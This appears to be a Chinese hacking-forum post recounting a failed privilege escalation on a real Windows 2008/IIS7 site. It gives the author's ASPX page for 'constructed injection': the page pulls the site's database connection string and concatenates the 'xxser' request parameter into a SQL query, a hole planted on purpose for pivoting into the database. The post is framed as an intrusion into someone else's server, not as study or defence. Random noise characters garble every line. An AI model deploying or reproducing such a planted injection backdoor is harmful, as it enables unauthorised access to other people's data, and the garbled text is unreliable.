昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
- o* t9 p7 F0 q& X$ y其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
. ^) E, e" Y& N2 }! b% r. Q代码量不多,自己写个拉倒了。烦死了。
/ A9 u) g% v# G5 Q0 K$ E+ n6 P3 n ^! E! Y
1 |2 ^2 E$ @! [' Y& X- l
8 K& m% h3 }/ u; z f/ m; U, X<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
% H9 m) a) Z- i% k9 S5 A<html xmlns="http://www.w3.org/1999/xhtml">0 H: A# L5 O2 K/ s" E( }
<head runat="server">3 `6 j& f7 v9 a7 X2 f
<title>暗影aspx构造注射专用页面</title>' K% F9 A5 H$ \. [1 L
</head>6 a, R% D2 K" v# @- p1 c1 O5 c
<body>& g; p' F" g; z
<form id="form1" runat="server">
5 @0 ^* o+ u- g; d <div>
4 j9 ^" Q& i6 u# Z# C <script language="c#" runat="server">3 r- I/ D/ x5 w
& C3 t' j( S/ t3 D: G void page_init(object sender, EventArgs e)4 M% f8 p5 O! ], D
{
* s; J2 D0 Q, W( a4 T
) P1 I% B" o3 g z$ @; K System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
x0 S' o- b6 j' U0 G
9 p9 U) ]6 |% s& v: J$ O- C conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();
! e4 g- L0 T. O9 [- H% r conn.Open();
7 C2 N& b; i% t) |8 s4 q: T4 i 4 T# H' W. T. o5 J9 @ A
string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=1+ t) j! k" ]* d* O) S
; ^4 S9 C" E' ~- |- k% i% {' E System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);
: K7 h2 ?- r/ @5 U! P# \4 e int x = command.ExecuteNonQuery();! b8 t* p; ~9 s6 k% _, F1 K4 A# y' u
Response.Write(i+"\n");
4 \! v8 i7 J- C/ Z m. y Response.Write(x);" R; j( d. O# k& S) ?- j
conn.Close();
# L/ D9 Z0 F: Q. J) g( h) w }
1 R( ^7 [2 x/ _3 S
- x# A3 n. M, C. T- n6 R0 U </script># ]- a. H5 h% p4 V$ b% a* [
</div>- k- M3 N# Y2 a, v. a
</form>
/ h: H+ L$ ^8 e. q( L2 Y U</body>, b7 ~: n( {) D/ F* B# S
</html>3 A, W6 f9 x2 j" [( r- P& f2 Z) j
|